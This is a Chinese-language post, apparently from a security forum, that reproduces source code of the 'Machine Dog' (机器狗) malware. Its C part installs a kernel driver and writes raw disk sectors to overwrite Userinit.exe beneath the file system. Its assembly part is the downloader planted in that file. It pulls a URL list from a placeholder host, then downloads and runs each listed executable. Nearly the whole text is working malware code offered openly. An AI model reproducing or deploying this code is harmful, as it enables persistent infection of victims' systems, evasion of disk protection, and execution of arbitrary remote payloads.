机器狗写入到userinit.exe文件的下载者源码(c及汇编)
机器狗源码(C语言的),将病毒体从资源中提取出来写入到第一个分区的指定文件中
// Test.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
//==============================================================================
#include <pshpack1.h>
typedef struct _PARTITION_ENTRY
{
UCHAR active; // 能否启动标志
UCHAR StartHead; // 该分区起始磁头号
UCHAR StartSector; // 起始柱面号高2位:6位起始扇区号
UCHAR StartCylinder; // 起始柱面号低8位
UCHAR PartitionType; // 分区类型
UCHAR EndHead; // 该分区终止磁头号
UCHAR EndSector; // 终止柱面号高2位:6位终止扇区号
UCHAR EndCylinder; // 终止柱面号低8位
ULONG StartLBA; // 起始扇区号
ULONG TotalSector; // 分区尺寸(总扇区数)
} PARTITION_ENTRY, *PPARTITION_ENTRY;
//==============================================================================
typedef struct _MBR_SECTOR
{
UCHAR BootCode[446];
PARTITION_ENTRY Partition[4];
USHORT Signature;
} MBR_SECTOR, *PMBR_SECTOR;
//==============================================================================
typedef struct _BBR_SECTOR
{
USHORT JmpCode; // 2字节跳转指令,跳转到引导代码
UCHAR NopCode; // 1字节nop指令,填充用,保证跳转指令长3个字节
UCHAR OEMName[8]; // 8字节的OEMName
// 下面开始为: BPB( BIOS Parameter Block )
USHORT BytesPerSector; // 每个扇区的字节数 (512 1024 2048 4096)
UCHAR SectorsPerCluster; // 每个簇的扇区数 ( 1 2 4 8 16 32 64 128 )两者相乘不能超过32K(簇最大大小)
USHORT ReservedSectors; // 从卷的第一个扇区开始的保留扇区数目,该值不能为0,对于FAT12/FAT16,该值通常为1,对于FAT32,典型值为32
UCHAR NumberOfFATs; // 卷上FAT数据结构的数目,该值通常应为2,[NTFS不使用NumberOfFATs字段,必须为0]
USHORT RootEntries; // 对于FAT12/FAT16,该值表示32字节目录项的数目,对于FAT32,该值必须为0;[NTFS不使用]
USHORT NumberOfSectors16; // 该卷上的扇区总数,该字段可以为0,如果该字段为0,则NumberOfSectors32不能为0;对于FAT32,该字段必须为0 [FAT32/NTFS不使用该字段]
UCHAR MediaDescriptor; // 介质类型
USHORT SectorsPerFAT16; // 该字段标识一个FAT结构占有的扇区数(FAT12/FAT16),对于FAT32卷,该字段必须为0;[FAT32/NTFS不使用该字段]
USHORT SectorsPerTrack; // 用于INT 0x13中断的每个磁道的扇区数
USHORT HeadsPerCylinder; // 用于INT 0x13中断的每个柱面的磁头数
ULONG HiddenSectors; // 包含该FAT卷的分区之前的隐藏扇区数
ULONG NumberOfSectors32; // 该字段包含该卷上的所有扇区数目,对于FAT32,该字段不为0;FAT12/FAT16可根据实际大小是否超过65536个扇区数决定是否采用该字段; [NTFS不使用该字段]
// 下面开始为: EBPB ( Extended BIOS Parameter Block )
ULONG SectorsPerFAT32; // 对于FAT32,该字段包含一个FAT的大小,而SectorsPerFAT16字段必须为0;
} BBR_SECTOR, *PBBR_SECTOR;
#include <poppack.h>
#define PARTITION_TYPE_NTFS 0x07
#define PARTITION_TYPE_FAT32 0x0B
#define PARTITION_TYPE_FAT32_LBA 0x0C
//==============================================================================
#define STR_SYSFILE_PATH TEXT("%SystemRoot%\\system32\\drivers\\pcihdd.sys")
#define STR_VIRFILE_PATH TEXT("%SystemRoot%\\System32\\Userinit.exe")
#define STR_DSKDEVICE_NAME TEXT("\\\\.\\PhysicalDrive0")
#define STR_HDDDEVICE_NAME TEXT("\\\\.\\PhysicalHardDisk0")
//==============================================================================
#define IOCTL_MYDEV_BASE 0xF000
#define IOCTL_MYDEV_Fun_0xF01 CTL_CODE(IOCTL_MYDEV_BASE, 0xF01, METHOD_BUFFERED, FILE_ANY_ACCESS)
//==============================================================================
DWORD InstallAndStartDriver(HMODULE ModuleHandle)
{
TCHAR filePath[MAX_PATH];
HANDLE fileHandle;
HRSRC hSysRes;
DWORD dwWritten;
DWORD dwSysLen;
PVOID lpSysBuf;
SC_HANDLE hSCManager;
SC_HANDLE hService;
SERVICE_STATUS sService;
DWORD errCode = ERROR_SUCCESS;
if(
(NULL == (hSysRes = FindResource(ModuleHandle, (LPCTSTR)1001, (LPCTSTR)1001)))
||
(0 == (dwSysLen = SizeofResource(ModuleHandle, hSysRes)))
||
(NULL == (lpSysBuf = LockResource(hSysRes)))
||
(0 == ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath[0], sizeof(filePath)))
||
(INVALID_HANDLE_VALUE == (fileHandle = CreateFile(filePath, GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)))
)
{
errCode = GetLastError();
goto FunExit00;
}
if(
!WriteFile(fileHandle, lpSysBuf, dwSysLen, &dwWritten, NULL)
||
!SetEndOfFile(fileHandle)
||
!FlushFileBuffers(fileHandle)
)
{
errCode = GetLastError();
}
CloseHandle(fileHandle);
if(ERROR_SUCCESS != errCode)
{
goto FunExit01;
}
if(NULL == (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit01;
}
hService = CreateService(
hSCManager,
TEXT("PciHdd"),
TEXT("PciHdd"),
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
filePath,
NULL,
NULL,
NULL,
NULL,
NULL
);
if(NULL != hService)
{
CloseServiceHandle(hService);
}
else
{
if(NULL != (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_ALL_ACCESS)))
{
ControlService(hService, SERVICE_CONTROL_STOP, &sService);
DeleteService(hService);
CloseServiceHandle(hService);
}
hService = CreateService(
hSCManager,
TEXT("PciHdd"),
TEXT("PciHdd"),
SERVICE_ALL_ACCESS,
SERVICE_KERNEL_DRIVER,
SERVICE_DEMAND_START,
SERVICE_ERROR_IGNORE,
filePath,
NULL,
NULL,
NULL,
NULL,
NULL
);
if(NULL != hService)
{
CloseServiceHandle(hService);
}
else
{
errCode = GetLastError();
goto FunExit02;
}
}
if(NULL == (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_START)))
{
errCode = GetLastError();
goto FunExit02;
}
StartService(hService, 0, NULL);
CloseServiceHandle(hService);
FunExit02:
CloseServiceHandle(hSCManager);
FunExit01:
DeleteFile(filePath);
FunExit00:
return errCode;
}
//==============================================================================
DWORD StopAndDeleteDriver(VOID)
{
TCHAR filePath[MAX_PATH];
SC_HANDLE hSCManager;
SC_HANDLE hService;
SERVICE_STATUS sService;
DWORD errCode = ERROR_SUCCESS;
if(NULL == (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit00;
}
if(NULL == (hService = OpenService(hSCManager, TEXT("PciHdd"), SERVICE_ALL_ACCESS)))
{
errCode = GetLastError();
goto FunExit01;
}
ControlService(hService, SERVICE_CONTROL_STOP, &sService);
DeleteService(hService);
CloseServiceHandle(hService);
FunExit01:
CloseServiceHandle(hSCManager);
FunExit00:
ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath[0], sizeof(filePath));
DeleteFile(filePath);
return errCode;
}
//==============================================================================
// 感染硬盘第一个分区的指定的文件
//
// 1)通过FSCTL_GET_RETRI_POINTERS获取文件数据的分布 信息
//
// 2)通过直接访问硬盘(\\\\.\\PhysicalHardDisk0)的的MDR和第一个分区的引导扇区得到分区参数来定位文件。
//
// 3)通过对比ReadFile读取的文件数据和自己定位后直接 读取所得到的文件数据,确定定位是否正确
//
// 入口参数:
// 要感染的文件名(完整路径)
//
// Return value:
// Success -> NULL
// Failed -> 指向出错信息的指针
//==============================================================================
DWORD WriteVirusToDisk(LPCTSTR VirusFile)
{
STARTING_VCN_INPUT_BUFFER iVcnBuf;
UCHAR oVcnBuf[272];
PRETRI_POINTERS_BUFFER lpVcnBuf;
DWORD dwVcnExtents;
LARGE_INTEGER startLcn;
PUCHAR lpClusterBuf;
DWORD dwClusterLen;
UCHAR dataBuf[512];
UCHAR diskBuf[512];
DWORD dataLen;
LARGE_INTEGER diskPos;
PPARTITION_ENTRY lpPartition;
ULONG dwPartitionStart;
ULONG dwPartitionType;
PBBR_SECTOR lpBootSector;
DWORD SectorsPerCluster;
HANDLE hHddDevice;
HANDLE hDskDevice;
HANDLE hVirusFile;
DWORD errCode = ERROR_SUCCESS;
if(INVALID_HANDLE_VALUE == (hHddDevice = CreateFileA(STR_HDDDEVICE_NAME, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL)))
{
errCode = GetLastError();
goto FunExit00;
}
//
if(INVALID_HANDLE_VALUE == (hVirusFile = CreateFileA(VirusFile, GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_NO_BUFFERING, NULL)))
{
errCode = GetLastError();
goto FunExit01;
}
iVcnBuf.StartingVcn.QuadPart = 0;
RtlZeroMemory(oVcnBuf, sizeof(oVcnBuf));
if(!DeviceIoControl(hVirusFile, FSCTL_GET_RETRI_POINTERS, &iVcnBuf, sizeof(iVcnBuf), &oVcnBuf[0], sizeof(oVcnBuf), &dataLen, NULL))
{
errCode = GetLastError();
goto FunExit02;
}
lpVcnBuf = (PRETRI_POINTERS_BUFFER)&oVcnBuf[0];
dwVcnExtents = lpVcnBuf->ExtentCount;
startLcn = lpVcnBuf->Extents[0].Lcn;
if(!dwVcnExtents)
{
errCode = (ULONG)(-3); // 文件太小, 不能操作
goto FunExit02;
}
if(startLcn.QuadPart == -1)
{
errCode = (ULONG)(-4); // 该文件是压缩文件, 不能操作
goto FunExit02;
}
ReadFile(hVirusFile, dataBuf, sizeof(dataBuf), &dataLen, NULL);
// 打开第一个物理硬盘
if(INVALID_HANDLE_VALUE == (hDskDevice = CreateFileA(STR_DSKDEVICE_NAME, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL)))
{
errCode = GetLastError();
goto FunExit02;
}
// 读取硬盘第一个扇区(MBR)
SetFilePointer(hDskDevice, 0, NULL, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
lpPartition = &(((PMBR_SECTOR)&diskBuf[0])->Partition[0]);
if(lpPartition[0].active != 0x80)
{
errCode = (ULONG)(-1); // 分区不是启动分区
goto FunExit03;
}
dwPartitionType = lpPartition[0].PartitionType;
if(
dwPartitionType != PARTITION_TYPE_FAT32
&&
dwPartitionType != PARTITION_TYPE_FAT32_LBA
&&
dwPartitionType != PARTITION_TYPE_NTFS
)
{
errCode = (ULONG)(-2); // 不支持的磁盘分区
goto FunExit03;
}
dwPartitionStart = lpPartition[0].StartLBA;
diskPos.QuadPart = dwPartitionStart * 512;
// 读取启动分区的第一个扇区(启动扇区)
SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
lpBootSector = (PBBR_SECTOR)&diskBuf[0];
SectorsPerCluster = lpBootSector->SectorsPerCluster;
// 根据FAT32/NTFS计算Userinit的起始簇的偏移量
diskPos.QuadPart = dwPartitionStart;
diskPos.QuadPart+= lpBootSector->ReservedSectors;
if(dwPartitionType == PARTITION_TYPE_FAT32 || dwPartitionType == PARTITION_TYPE_FAT32_LBA)
{
diskPos.QuadPart+= lpBootSector->NumberOfFATs * lpBootSector->SectorsPerFAT32;
}
diskPos.QuadPart+= startLcn.QuadPart * SectorsPerCluster;
diskPos.QuadPart*= 512;
// 检查文件寻址
SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
ReadFile(hDskDevice, diskBuf, sizeof(diskBuf), &dataLen, NULL);
if(!RtlEqualMemory(dataBuf, diskBuf, sizeof(diskBuf)))
{
errCode = (ULONG)(-5); // 寻址文件不成功
goto FunExit03;
}
// 分配缓冲
dwClusterLen = SectorsPerCluster*512;
lpClusterBuf = (PUCHAR)GlobalAlloc(GMEM_ZEROINIT, dwClusterLen); // 保存一个簇所要的缓冲
if(!lpClusterBuf)
{
errCode = GetLastError(); // 寻址文件不成功
goto FunExit03;
}
// 把Virus文件的数据从SYS文件资源段中解码出来
if(!DeviceIoControl(
hVirusFile,
IOCTL_MYDEV_Fun_0xF01,
(PVOID)0x00401000, // 本执行文件代码段的开始, 在C语言中我不会表达
0x73E, // 本执行文件代码段的长度, 在C语言中我不会表达
lpClusterBuf,
dwClusterLen,
&dataLen,
NULL
))
{
errCode = GetLastError();
goto FunExit04;
}
// 写Virus文件的数据到磁盘
SetFilePointer(hDskDevice, diskPos.LowPart, &diskPos.HighPart, FILE_BEGIN);
WriteFile(hDskDevice, lpClusterBuf, dwClusterLen, &dataLen, NULL);
FlushFileBuffers(hDskDevice);
errCode = ERROR_SUCCESS;
FunExit04:
GlobalFree(lpClusterBuf);
FunExit03:
CloseHandle(hDskDevice);
FunExit02:
CloseHandle(hVirusFile);
FunExit01:
CloseHandle(hHddDevice);
FunExit00:
return errCode;
}
//==============================================================================
int _tmain(int argc, _TCHAR* argv[])
{
TCHAR filePath[MAX_PATH];
DWORD errCode;
if(ERROR_SUCCESS != (errCode = InstallAndStartDriver(GetModuleHandleA(NULL))))
{
MessageBox(NULL, TEXT("驱动程序的加载没有成功,程序将无法运行"), NULL, MB_ICONERROR);
goto FunExit00;
}
ExpandEnvironmentStrings(STR_VIRFILE_PATH, &filePath[0], sizeof(filePath));
WriteVirusToDisk(filePath);
StopAndDeleteDriver();
FunExit00:
return 0;
}
//-----------------------------------------------------
汇编代码:
机器狗写入到userinit.exe文件的下载者源码
文章作者:naitm
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章备注:从IDA中复制,稍作修改所得。
ASM
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 机器狗写入到userinit.exe文件的恶意代码
; by naitm(http://hi.baidu.com/naitm)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat,stdcall
option casemap:none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include Advapi32.inc
includelib Advapi32.lib
include wininet.inc
includelib wininet.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data
nThreadCount dd 0
g_ThreadCount dd 0
PathName db '.',0
szAgent db 'Shell',0
szUser32Dll db 'user32.dll',0
szLoadRemoteFonts db 'LoadRemoteFonts',0
szSubKey db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
szUrlList db 'http://127.0.0.1/cert.cer',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RunIt proc @lpExePath
local @ProcessInformation:PROCESS_INFORMATION
local @StartupInfo:STARTUPINFO
invoke GetStartupInfo,addr @StartupInfo
invoke CreateProcess,0,@lpExePath,0,0,0,20h,0,0,addr @StartupInfo,addr @ProcessInformation
.if eax == 0
invoke CloseHandle,@ProcessInformation.hThread
invoke CloseHandle,@ProcessInformation.hProcess
.endif
leave
retn 4
_RunIt endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DownloadFile proc @lpURL,@lpSaveFile,@Buffer
local @hInternet,@hInternetFile,@hLocalFile,@nNumberOfBytesToWrite,@NumberOfBytesWritten,@nWriteCount
local @lpbuffer[200h]:BYTE
xor eax, eax
mov @nWriteCount, eax
invoke InternetOpen,addr szAgent,0,0,0,0
.if eax != 0
mov @hInternet, eax
invoke InternetSetOption,@hInternet,2,@Buffer,4
invoke InternetSetOption,@hInternet,6,@Buffer,4
invoke InternetOpenUrl,@hInternet,@lpURL,0,0,200000h,0
.if eax != 0
mov @hInternetFile, eax
mov @nNumberOfBytesToWrite, 0
mov @NumberOfBytesWritten, 200h
invoke HttpQueryInfo,@hInternetFile,13h,addr @lpbuffer,\
addr @NumberOfBytesWritten,addr @nNumberOfBytesToWrite
.if eax != 0
invoke CreateFile,@lpSaveFile,40000000h,0,0,4,0,0
.if eax != 0FFFFFFFFh
mov @hLocalFile, eax
.while TRUE
mov @nNumberOfBytesToWrite, 0
invoke InternetReadFile,@hInternetFile,addr @lpbuffer,200h,addr @nNumberOfBytesToWrite
.break .if (!eax)
.break .if (@nNumberOfBytesToWrite==0)
inc @nWriteCount
invoke WriteFile,@hLocalFile,addr @lpbuffer,@nNumberOfBytesToWrite,\
addr @NumberOfBytesWritten,0
.endw
invoke SetEndOfFile,@hLocalFile
invoke CloseHandle,@hLocalFile
.endif
.endif
invoke InternetCloseHandle,@hInternetFile
.endif
invoke InternetCloseHandle,@hInternet
.endif
mov eax, @nWriteCount
leave
retn 0Ch
_DownloadFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DownloadEXERunIt proc @lpURL
local @DownTimes
local @TempFileName[204h]:BYTE
local @TempFileName2[204h]:BYTE
local @szUrl[104h]:BYTE
mov @DownTimes, 3Ch
invoke lstrcpy,addr @szUrl,@lpURL
invoke RtlZeroMemory,addr @TempFileName,204
invoke GetTempFileName,offset PathName,0,0,addr @TempFileName
invoke lstrcpy,addr @TempFileName2,addr @TempFileName
DownloadNxTime:
invoke _DownloadFile,addr @szUrl,addr @TempFileName,1388h
or eax, eax
jz DownloadFailed
invoke lstrcpy,addr @TempFileName,addr @TempFileName2
invoke _RunIt,addr @TempFileName
jmp DownloadEnd
; ---------------------------------------------------------------------------
DownloadFailed:
invoke Sleep,3E8h
dec @DownTimes
jnz DownloadNxTime
DownloadEnd:
dec nThreadCount
leave
retn 4
_DownloadEXERunIt endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
main proc
local hKey,hObject,hFile,lpBaseAddress,ThreadId
local szShellValue[104h]:BYTE
invoke LoadLibrary,offset szUser32Dll
or eax, eax
jz RegQueryShell
invoke GetProcAddress,eax,offset szLoadRemoteFonts
or eax, eax
jz RegQueryShell
call eax
RegQueryShell:
invoke RegOpenKeyEx,80000002h,offset szSubKey,0,20019h,addr hKey
or eax, eax
jnz TestInternet
mov ThreadId, 104h
invoke RtlZeroMemory,addr szShellValue,104h
invoke RegQueryValueEx,hKey,offset szAgent,0,0,addr szShellValue,addr ThreadId
invoke _RunIt,addr szShellValue
invoke RegCloseKey,hKey
TestInternet:
invoke Sleep,3E8h
invoke InternetGetConnectedState,addr ThreadId,0
or eax, eax
jnz InternetConnect_OK
jmp TestInternet
; ---------------------------------------------------------------------------
InternetConnect_OK:
invoke RtlZeroMemory,addr szShellValue,104h
invoke GetTempFileName,offset PathName,0,0,addr szShellValue
DownList:
invoke Sleep,3E8h
invoke _DownloadFile,offset szUrlList,addr szShellValue,1388h
or eax, eax
jz DownListFailed
mov nThreadCount, 0
invoke CreateFile,addr szShellValue,GENERIC_READ,0,0,3,0,0
cmp eax, INVALID_HANDLE_VALUE
jz ReaptDownList
mov hFile, eax
invoke GetFileSize,hFile,0
cmp eax, 0Fh
jnb BeginDownEXE
invoke CloseHandle,hFile
jmp DownList
; ---------------------------------------------------------------------------
BeginDownEXE:
invoke CreateFileMapping,hFile,0,2,0,0,0
or eax, eax
jz CreateMapFailed
mov hObject, eax
invoke MapViewOfFile,eax,4,0,0,0
or eax, eax
jz MapViewFailed
mov lpBaseAddress, eax
mov esi, eax
loc_4005E1:
lea edi, szShellValue
push 104h
push edi
call RtlZeroMemory
WetherNewLine:
lodsb
cmp al, 0Ah
jnz loc_4005F8
lodsb
loc_4005F8:
cmp al, 0Dh
jz loc_400605
stosb
or al, al
jz UrlListEnd
jmp WetherNewLine
; ---------------------------------------------------------------------------
jmp UrlListEnd
; ---------------------------------------------------------------------------
loc_400605:
cmp szShellValue, 0
jz NextLine
inc nThreadCount
invoke CreateThread,0,0,offset _DownloadEXERunIt,addr szShellValue,0,addr ThreadId
invoke CloseHandle,eax
invoke Sleep,64h
NextLine:
jmp loc_4005E1
; ---------------------------------------------------------------------------
UrlListEnd:
invoke UnmapViewOfFile,lpBaseAddress
MapViewFailed:
invoke CloseHandle,hObject
CreateMapFailed:
invoke CloseHandle,hFile
jmp WetherTreadend
; ---------------------------------------------------------------------------
ReaptDownList:
jmp DownList
; ---------------------------------------------------------------------------
jmp WetherTreadend
; ---------------------------------------------------------------------------
DownListFailed:
jmp DownList
; ---------------------------------------------------------------------------
WetherTreadend:
cmp nThreadCount, 0
jz ExitProgram
invoke Sleep,64h
jmp WetherTreadend
; ---------------------------------------------------------------------------
ExitProgram:
invoke ExitProcess,0
main endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
机器狗写入到userinit.exe文件的下载者源码(c及汇编)相关推荐
- 用UpdateResource修改EXE文件图标的多源码(已修正) 注:转帖请包函作者信息.(作者:菜新)
微软官网UpdateResource 其它参考信息: https://msdn.microsoft.com/zh-cn/library/ms648008.aspx#_win32_Updating_Re ...
- 复合型机器狗病毒的***(lssass.exe)
from: [url]http://hi.baidu.com/newcenturysun[/url]) 最近机器狗病毒盛行,而***为了进一步增强病毒的破坏能力,在机器狗病毒中加入了很多"新 ...
- 构建ASP.NET MVC4+EF5+EasyUI+Unity2.x注入的后台管理系统(32)-swfupload多文件上传[附源码]...
原文:构建ASP.NET MVC4+EF5+EasyUI+Unity2.x注入的后台管理系统(32)-swfupload多文件上传[附源码] 文件上传这东西说到底有时候很痛,原来的asp.net服务器 ...
- java flexpaper_java web word文件 pdf文件在线预览源码(flexpaper)
[实例简介]java web word文件 pdf文件在线预览源码 经过测试 [实例截图] [核心代码] BrowsenOnline html, body{ height:100%; } body { ...
- 下载CentOS源码、Hyper-V虚拟机联网、拷贝文件到Hyper-V虚拟机中的Linux系统
下载CentOS源码: 先查看CentOS版本和内核版本:后面那个是内核版本: 进入CentOS官网:找到对应操作系统版本: 进入:os - Source - SPackages目录: 找到对应内核版 ...
- C++ Opengl 显示TGA文件和扩展名源码
C++ Opengl 显示TGA文件和扩展名源码 项目开发环境 项目功能 项目演示 项目源码传送门 项目开发环境 开发语言:C++和IDE:VS2017,操作系统Windows版本windows SD ...
- php文件直链源码,蓝奏网盘文件夹直链解析源码
蓝奏网盘文件夹直链解析源码 @晶晶易.版本 2 .支持库 spec .程序集 程序集1 .子程序 _启动子程序, 整数型, , 本子程序在程序启动后最先执行 .局部变量 返回文本, 文本型 .局部变量 ...
- 【python】又拍云采集工具助手exe带python图片采集源码
[python]又拍云采集工具助手exe带python图片采集源码 论坛的老哥要的东西!练手试了一下! 技术比较渣,见谅! 拿去玩! 适合想要获取 又拍云 相册图片的需求! 自己测试了一下,没有用多线 ...
- android文件夹管理器源码实现,Android文件夹管理器源码实现
一.资源管理器介绍 现在在一些移动终端上面都会有自带的资源管理器,其实其并非是Android系统自带,而是手机产商与app开发商的合作而导致融合,借助第三方的开发软件预装在出厂的手机,是新时代下的另一 ...
最新文章
- mongo在哪创建管理员_MongoDB初始化创建管理员账户登录
- photo.php,EasyPhoto.php
- php 正则mac地址,正则表达式匹配MAC地址、邮箱地址、IP地址
- JVM初学之JVM的运行时数据区
- 【广告技术】如何提升定向广告效果?腾讯广告提出高质量负实例生成新方法
- (转)一段如何調用Button.Click事件的故事
- SQL Server 按某一字段分组取最大(小)值所在行的数据
- AirServer for mac如何实现无线投屏
- 超强免解压看图片压缩包工具(Made in Korea)
- stm32_跑马灯程序
- RTX(2009)整合注意点
- 如何管理和组织一个机器学习项目
- 程序员需要学会宏观看待问题
- android拍照文件没有读写权限,Android6.0之后的拍照+本地存储权限问题
- Tapd+腾讯工蜂+Jenkins持续部署
- obj文件转gltf文件
- 复杂事件处理(CEP)的理解(上)
- 【踩坑实录】Mission planner+Ardupilot飞控固件配置教程
- python 最大子序列之和
- 做好SEO必备的三步骤
热门文章
- AD(Active Directory)和LDAP
- 2020年保研、夏令营、预推免记录
- 面试前必备技能get:如何知彼?
- Table 表格,dl dt dd 标签
- linux 桌面显示天气,如何在Linux中显示天气条件作为壁纸 | MOS86
- 麻瓜 | 数学建模日记 | 第三天
- 功能齐全的涂鸦软件WTest
- 【Excel学习笔记14】排序和筛选的详细操作解释
- libtorch+GPU部署wenet语音识别(gRPC通信)
- php网站mercury安装,mercury路由器怎么安装? | 192路由网